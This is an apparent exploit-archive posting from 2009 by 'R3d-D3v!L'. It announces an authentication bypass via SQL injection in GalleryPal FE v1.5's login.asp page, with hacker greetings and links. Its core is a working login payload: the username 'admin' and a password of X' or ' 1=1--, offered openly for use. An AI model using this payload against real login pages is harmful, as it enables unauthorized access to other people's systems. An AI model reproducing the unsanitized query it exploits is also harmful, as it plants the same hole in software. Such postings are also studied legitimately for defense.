[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : GalleryPal FE v1.5(Auth Bypass)
# Published : 2009-12-15
# Author : R3d-D3v!L
# Previous Title : iGaming CMS v1.5 CSRF Vulnerability
# Next Title : SitePal v1.1(Auth Bypass) SQL Injection Vulnerability


------------------------------------------------------------
[~] GalleryPal FE v1.5(Auth Bypass)

[~]TYPE:Remote SQL Injection Vulnerability

[~] ----------------------------------------------------------

[~] author: R3d-D3v!L

[~]

[~] Date: 15.11.2008

[~]

[~] Home: www.ahacker.net

[~]

[~] contact: N/A

[~]

[~] -----------------------------------------------------------


ALERT FR0M THE DARKNESS BY 7h3 REd-D3v!L

[~] Exploit:



[*] username : admin


[*] password : X' or ' 1=1--

[*] demo:

[*] server/GalleryPal_FE_Demo/login.asp



[~] spechial thanks : ((dolly)) & ((7am3m)) & ((magoush_1987)) & (DEV!L_MODE) & ((0R45hy)) & {0}-{n-c-A}-{0}

[~]

[?] 4.!.S ---> ((R3d D?v!L))--JuPA--M2Z --d3v!L-Ro07

[~]

[~] www.xp10.me

[~]

[~]I4M:4r48!4N-3XPLO!73r